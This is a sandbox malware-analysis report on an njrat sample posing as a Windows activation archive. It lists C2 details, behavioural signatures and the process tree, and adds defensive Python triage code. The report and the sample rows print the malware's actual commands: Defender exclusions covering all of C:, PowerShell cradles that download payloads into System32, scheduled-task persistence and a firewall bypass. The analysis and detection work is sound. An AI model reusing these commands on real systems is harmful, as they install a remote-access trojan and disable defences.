Analysis

max time kernel: 60s
max time network: 62s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-12-2024 17:57
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&
Resource: win10v2004-20241007-en

General

Target: https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&
Malware Config

Extracted
Family: njrat
Version: 0.7d
Campaign ID: MPG
C2: 49.228.131.165:2422
fa6b40864b6c109adbc85023cd1f59d2 (unlabelled field in the report; same value as reg_key)
reg_key: fa6b40864b6c109adbc85023cd1f59d2
splitter: Y262SUCZ4UJJ
Signatures

Njrat family
Blocklisted process makes network request 6 IoCs
flow  PID   process
36    1900  powershell.exe
38    4672  rundll32.exe
39    4672  rundll32.exe
40    3988  powershell.exe
55    6004  rundll32.exe
56    4276  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Runs PowerShell to modify Windows Defender settings and add exclusions for file extensions, paths and processes.
PID   process
1908  powershell.exe
3172  powershell.exe
3988  powershell.exe
4276  powershell.exe
1900  powershell.exe
4832  powershell.exe
5192  powershell.exe
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
All 40 operations are performed by reg.exe under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (IFEO) for two images: osppsvc.exe (the Office Software Protection Platform service) and SppExtComObj.exe (the Windows KMS connection broker). Under each key, GlobalFlag = 256 (0x100, FLG_APPLICATION_VERIFIER) together with VerifierDlls = "SppExtComObjHook.dll" makes the loader map that DLL into the process at start-up; the DLL itself is written to C:\Windows\System32\SppExtComObjHook.dll by powershell.exe (see "Drops file in System32 directory"). The KMS_* values are not Windows settings but configuration read by the hook DLL, which acts as a KMS activation emulator (KMS_Emulation = 1).

Key created (9 times): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe (reg.exe)
Key created (11 times): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe (reg.exe)

Values set under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe (all by reg.exe):
Set value (int) GlobalFlag = "256"
Set value (int) VerifierFlags = "2147483648"
Set value (int) VerifierDebug = "0"
Set value (str) VerifierDlls = "SppExtComObjHook.dll"
Set value (int) KMS_Emulation = "1"
Set value (int) KMS_ActivationInterval = "120" (2 times)
Set value (int) KMS_RenewalInterval = "10080" (2 times)

Values set under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe (all by reg.exe):
Set value (int) GlobalFlag = "256"
Set value (int) VerifierFlags = "2147483648"
Set value (int) VerifierDebug = "0"
Set value (str) VerifierDlls = "SppExtComObjHook.dll"
Set value (int) KMS_Emulation = "1"
Set value (int) KMS_HWID = "4187226795851251830" (2 times)
Set value (int) KMS_ActivationInterval = "120" (2 times)
Set value (int) KMS_RenewalInterval = "10080" (2 times)
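The rows above are the signature's raw output. The following Python is an added example, not part of the report or of the sample: it parses rows in exactly that shape and decides, per target image, whether the writes configure Application Verifier DLL injection, i.e. GlobalFlag with bit 0x100 (FLG_APPLICATION_VERIFIER) together with a VerifierDlls value. It also reports the other classic IFEO hijack (a Debugger value). The sample rows are constructed from values in the report; the notepad.exe Debugger row is invented for contrast and does not come from the report.

```python
"""Triage of Image File Execution Options (IFEO) registry writes.

Added example, not part of the sandbox report or of the analysed sample.
Rows are parsed in the shape the report prints them:
    Set value (<type>) <key path>\\<value name> = "<data>" <process>
Only "Set value" rows carry data; "Key created" rows are skipped.
"""
import re
from collections import defaultdict

# GlobalFlag bit that makes the loader honour VerifierDlls for the image.
FLG_APPLICATION_VERIFIER = 0x100

IFEO_PREFIX = ("\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT"
               "\\CurrentVersion\\Image File Execution Options\\")

# The key path is matched non-greedily so the value name is the last component.
ROW_RE = re.compile(
    r'^Set value \((?P<type>int|str)\) (?P<path>.+?)\\(?P<name>[^\\ ]+)'
    r' = "(?P<value>[^"]*)" (?P<proc>\S+)$'
)


def parse_row(row):
    """Return a dict for a 'Set value' row, or None for any other row."""
    m = ROW_RE.match(row)
    return m.groupdict() if m else None


def ifeo_target(path):
    """Image name an IFEO key applies to, or None if the key is not under IFEO."""
    if not path.lower().startswith(IFEO_PREFIX.lower()):
        return None
    return path[len(IFEO_PREFIX):].split("\\")[0]


def analyse(rows):
    """Group IFEO value writes per image and flag verifier DLL injection."""
    per_image = defaultdict(dict)
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        image = ifeo_target(rec["path"])
        if image is None:
            continue
        per_image[image.lower()][rec["name"]] = rec["value"]

    findings = {}
    for image, values in per_image.items():
        try:
            gflags = int(values.get("GlobalFlag", "0"), 0)
        except ValueError:
            gflags = 0
        dlls = values.get("VerifierDlls", "").split()
        findings[image] = {
            # Both are needed: the flag alone only enables the verifier,
            # and a DLL list without the flag is ignored by the loader.
            "verifier_injection": bool(gflags & FLG_APPLICATION_VERIFIER) and bool(dlls),
            "dlls": dlls,
            # Classic IFEO hijack: Debugger runs instead of the image.
            "debugger": values.get("Debugger"),
            # Values that are not Windows settings (here the KMS hook's config).
            "foreign_values": sorted(n for n in values if n.startswith("KMS_")),
        }
    return findings


def _row(image, name, data, rtype="int", proc="reg.exe"):
    """Build a row string in the report's format (helper for the sample data)."""
    return 'Set value (%s) %s%s\\%s = "%s" %s' % (rtype, IFEO_PREFIX, image, name, data, proc)


# Constructed sample: values taken from the report, plus one invented
# notepad.exe Debugger row and one "Key created" row to show they are handled.
SAMPLE_ROWS = [
    _row("osppsvc.exe", "GlobalFlag", "256"),
    _row("osppsvc.exe", "VerifierDlls", "SppExtComObjHook.dll", rtype="str"),
    _row("osppsvc.exe", "VerifierFlags", "2147483648"),
    _row("osppsvc.exe", "KMS_Emulation", "1"),
    _row("SppExtComObj.exe", "GlobalFlag", "256"),
    _row("SppExtComObj.exe", "VerifierDlls", "SppExtComObjHook.dll", rtype="str"),
    _row("SppExtComObj.exe", "KMS_HWID", "4187226795851251830"),
    _row("notepad.exe", "Debugger", "C:\\tools\\dbg.exe", rtype="str"),  # invented
    "Key created " + IFEO_PREFIX + "osppsvc.exe reg.exe",
]

if __name__ == "__main__":
    for image, finding in analyse(SAMPLE_ROWS).items():
        print(image, finding)
```

The same logic applies to live telemetry (Sysmon event 13 on the IFEO path) once the path, value name and data are split out the same way; the decision is per image, because a VerifierDlls value without the GlobalFlag bit on the same key does nothing.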
Modifies Windows Firewall 2 TTPs 1 IoCs
PID   process
3700  netsh.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence check.
Key value queried: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation (MyPrograme.exe)
Executes dropped EXE 4 IoCs
PID   process
3492  MyPrograme.exe
1016  setup.exe
5252  wininitt.exe
5684  wininitt.exe
Loads dropped DLL 5 IoCs
PID   process
3492  MyPrograme.exe
3492  MyPrograme.exe
4672  rundll32.exe
6004  rundll32.exe
1908  Process not Found
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow  ioc
35    raw.githubusercontent.com
36    raw.githubusercontent.com
38    raw.githubusercontent.com
40    raw.githubusercontent.com
55    raw.githubusercontent.com
56    raw.githubusercontent.com
Drops file in System32 directory 5 IoCs
File created: C:\Windows\SysWOW64\D3DX9.dll (MyPrograme.exe)
File opened for modification: C:\Windows\SysWOW64\D3DX9.dll (MyPrograme.exe)
File created: C:\Windows\System32\vcruntime143_thread.dll (powershell.exe)
File opened for modification: C:\Windows\System32\vcruntime143_thread.dll (setup.exe)
File created: C:\Windows\System32\SppExtComObjHook.dll (powershell.exe)
Drops file in Windows directory 5 IoCs
File opened for modification: C:\Windows\Help\service (rundll32.exe)
File created: C:\Windows\Help\service\wininitt.exe (powershell.exe)
File opened for modification: C:\Windows\Help\service\wininitt.exe (rundll32.exe)
File opened for modification: C:\Windows\Help\service (rundll32.exe)
File created: C:\Windows\Help\service\wininitt.exe (powershell.exe)
Launches sc.exe 9 IoCs
sc.exe is the Windows utility for controlling services on the system.
PIDs (all sc.exe): 388, 4664, 4644, 5148, 5964, 2004, 3976, 1076, 5984
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The WOW6432Node path shows that the 32-bit netsh.exe was run (it was launched from the 32-bit cmd.exe chain under MyPrograme.exe), so any helper DLL it would load must be 32-bit.
Key opened: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
Key queried: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, 48 entries in total: cmd.exe (44), wininitt.exe (2), netsh.exe (1), MyPrograme.exe (1)
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (Integrator.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (Integrator.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Integrator.exe)
Delays execution with timeout.exe 1 IoCs
PID   process
1020  timeout.exe
Enumerates system info in registry 2 TTPs 9 IoCs
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (MyPrograme.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion (MyPrograme.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (Integrator.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (MyPrograme.exe)
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (Integrator.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (Integrator.exe)
Modifies data under HKEY_USERS 3 IoCs
Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry (chrome.exe)
Set value (int): \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784998509690858" (chrome.exe)
Key deleted: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState (reg.exe)
Modifies registry class 2 IoCs
Key created: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings (chrome.exe)
Key created: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings (MyPrograme.exe)
Modifies registry key 1 TTPs 46 IoCs
46 reg.exe invocations. PIDs: 4372, 4808, 2004, 6112, 6048, 1852, 5520, 4420, 1712, 5456, 5604, 4392, 3156, 312, 384, 5396, 3592, 5148, 228, 5812, 2180, 5188, 5312, 5732, 5076, 5564, 5624, 5076, 6136, 5212, 1236, 5496, 312, 5660, 6020, 1060, 4568, 8, 4360, 1900, 5424, 876, 6016, 1344, 5392, 5380 (some PIDs are reused by later processes)
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID   process
5952  schtasks.exe
5168  schtasks.exe
876   schtasks.exe
1940  schtasks.exe
Suspicious behavior: EnumeratesProcesses 35 IoCs
chrome.exe PID 3340 (2 entries); powershell.exe PIDs 3172, 2256, 5008, 1908, 1900, 3988, 4832, 5792, 6024, 4276, 5192 (3 entries each)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
chrome.exe PID 3340 (2 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
chrome.exe PID 3340: SeShutdownPrivilege and SeCreatePagefilePrivilege, adjusted repeatedly in pairs (48 entries)
7zG.exe PID 4540: SeRestorePrivilege, privilege 35 (reported by LUID only), SeSecurityPrivilege (2 entries)
powershell.exe PID 3172: SeDebugPrivilege
WMIC.exe PID 4888: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege
Suspicious use of FindShellTrayWindow 41 IoCs
chrome.exe PID 3340 (40 entries); 7zG.exe PID 4540 (1 entry)
Suspicious use of SendNotifyMessage 24 IoCs
chrome.exe PID 3340 (24 entries)
Suspicious use of SetWindowsHookEx 3 IoCs
setup.exe PID 1016 (1 entry); Integrator.exe PID 396 (2 entries)
Suspicious use of WriteProcessMemory 64 IoCs
All 64 entries are chrome.exe PID 3340 writing into its own child processes: PID 3708 (procid_target 83), PID 904 (procid_target 84), PID 1984 (procid_target 85) and PID 232 (procid_target 86).
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
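The signatures above are what the sandbox flags; when the same behaviour appears in endpoint telemetry a responder needs rules over process command lines. The following Python is an added example, not part of the report or of the sample. It runs four rules over a constructed process list: a Defender exclusion added with Add-MpPreference (a wildcard such as C:\* rated high), a PowerShell download cradle whose -OutFile lands under C:\Windows, a schtasks /create whose action is a LOLBin such as rundll32, and a netsh firewall change. The command lines for PIDs 3172, 1908, 1900, 876 and 1020 are copied from the process tree in this report; the netsh line for PID 3700 is invented, because the report records only that netsh.exe modified the firewall.

```python
"""Command-line triage rules for the behaviours flagged in this report.

Added example, not part of the sandbox report or of the analysed sample.
Each rule takes one process record and returns a Finding or None.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str      # full image path
    cmdline: str    # command line as logged


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    severity: str   # "high" or "medium"
    detail: str


def image_name(p):
    return p.image.rsplit("\\", 1)[-1].lower()


def rule_defender_exclusion(p):
    """Add-MpPreference -Exclusion{Path,Process,Extension}; wildcard scope is high."""
    if image_name(p) != "powershell.exe":
        return None
    m = re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']*)'",
                  p.cmdline, re.I)
    if not m:
        return None
    kind, target = m.group(1), m.group(2)
    broad = "*" in target or target.rstrip("\\").lower() == "c:"
    return Finding(p.pid, "defender_exclusion", "high" if broad else "medium",
                   "%s exclusion for %s" % (kind, target))


def rule_download_cradle(p):
    """Invoke-WebRequest ... -OutFile; a destination under C:\\Windows is high."""
    if image_name(p) != "powershell.exe":
        return None
    m = re.search(r"(Invoke-WebRequest|iwr|curl|wget)\s+'(https?://[^']+)'.*?-OutFile\s+'([^']+)'",
                  p.cmdline, re.I)
    if not m:
        return None
    url, out = m.group(2), m.group(3)
    severity = "high" if out.lower().startswith("c:\\windows\\") else "medium"
    return Finding(p.pid, "download_cradle", severity, "%s -> %s" % (url, out))


def rule_schtasks_lolbin(p):
    """schtasks /create whose /tr action runs rundll32, regsvr32, mshta or powershell."""
    if image_name(p) != "schtasks.exe" or "/create" not in p.cmdline.lower():
        return None
    m = re.search(r'/tr\s+"([^"]+)"', p.cmdline, re.I)
    if not m:
        return None
    action = m.group(1)
    if not re.search(r"\b(rundll32|regsvr32|mshta|powershell)(\.exe)?\b", action, re.I):
        return None
    lower = p.cmdline.lower()
    # Once a minute at highest run level is the pattern this sample uses.
    aggressive = "/rl highest" in lower or re.search(r"/sc\s+minute\s+/mo\s+1\b", lower)
    return Finding(p.pid, "schtasks_lolbin_action", "high" if aggressive else "medium", action)


def rule_netsh_firewall(p):
    """Any netsh invocation touching the firewall configuration."""
    if image_name(p) != "netsh.exe":
        return None
    if re.search(r"\b(advfirewall|firewall)\b", p.cmdline, re.I):
        return Finding(p.pid, "firewall_modification", "medium", p.cmdline)
    return None


RULES = (rule_defender_exclusion, rule_download_cradle, rule_schtasks_lolbin, rule_netsh_firewall)


def triage(procs):
    """Apply every rule to every process and return all findings."""
    findings = []
    for p in procs:
        for rule in RULES:
            f = rule(p)
            if f is not None:
                findings.append(f)
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample. Lines for PIDs 3172, 1908, 1900, 876 and 1020 are copied from
# the report's process tree; the netsh line (PID 3700) is invented.
SAMPLE_PROCS = [
    Proc(3172, PS, r'''powershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"'''),
    Proc(1908, PS, r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\\*'"'''),
    Proc(1900, PS, PS + r''' -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/ZUMBAA' -OutFile 'C:\Windows\System32\vcruntime143_thread.dll'"'''),
    Proc(876, r"C:\Windows\SYSTEM32\schtasks.exe",
         r'''schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"'''),
    Proc(3700, r"C:\Windows\SysWOW64\netsh.exe",  # invented command line
         r'netsh advfirewall firewall add rule name="svc" dir=in action=allow program="C:\Windows\Help\service\wininitt.exe"'),
    Proc(1020, r"C:\Windows\system32\timeout.exe", "timeout /t 2 /nobreak"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_PROCS):
        print(f.severity.upper(), f.pid, f.rule, f.detail)
```

The rules key on image name rather than on the first token of the command line because this sample launches PowerShell both as "powershell" and by full path; a rule that matched only one spelling would miss half the chain.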
Processes
PID 3340, depth 1, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1241155149938954361/1316826199187783790/activate-windows.rar?ex=675c7577&is=675b23f7&hm=819a1d87c57a337665c84eaa15a12a319312e0f6ce1d43f1870c7f82c4125ec9&
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory

PID 3708, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4807cc40,0x7ffd4807cc4c,0x7ffd4807cc58

PID 904, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

PID 1984, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3

PID 232, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2404 /prefetch:8

PID 3788, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

PID 4032, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1

PID 4564, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8

PID 4568, depth 2, image C:\Program Files\Google\Chrome\Application\chrome.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4644,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:8
PID 1920, depth 1, image C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
  cmdline: "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

PID 1160, depth 1, image C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

PID 4044, depth 1, image C:\Windows\System32\rundll32.exe
  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

PID 4540, depth 1, image C:\Program Files\7-Zip\7zG.exe
  cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\activate-windows\" -spe -an -ai#7zMap12930:94:7zEvent6394
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID 3492, depth 1, image C:\Users\Admin\Downloads\activate-windows\MyPrograme.exe
  cmdline: "C:\Users\Admin\Downloads\activate-windows\MyPrograme.exe"
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class

PID 2748, depth 2, image C:\Windows\SysWOW64\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\run_setup.bat"
- System Location Discovery: System Language Discovery

PID 5064, depth 3, image C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c "setup.exe"
- System Location Discovery: System Language Discovery

PID 1016, depth 4, image C:\Users\Admin\AppData\Local\Temp\setup.exe
  cmdline: setup.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak6⤵
- Delays execution with timeout.exe
PID:1020
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1908
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"5⤵
- Scheduled Task/Job: Scheduled Task
PID:876
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:1668
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/ZUMBAA' -OutFile 'C:\Windows\System32\vcruntime143_thread.dll'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1900
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:876
C:\Windows\system32\rundll32.exerundll32.exe vcruntime143_thread.dll,Start6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:4672
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"7⤵
- Scheduled Task/Job: Scheduled Task
PID:1940
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat7⤵PID:4132
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3988
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5252
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Help\service\wininitt.exe" "wininitt.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3700
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:1836
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:2436
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:992
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:4420
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:4784
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:4376
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2256
C:\Windows\system32\find.exefind /i "Full"3⤵PID:4304
C:\Windows\system32\reg.exereg query HKU\S-1-5-193⤵PID:4564
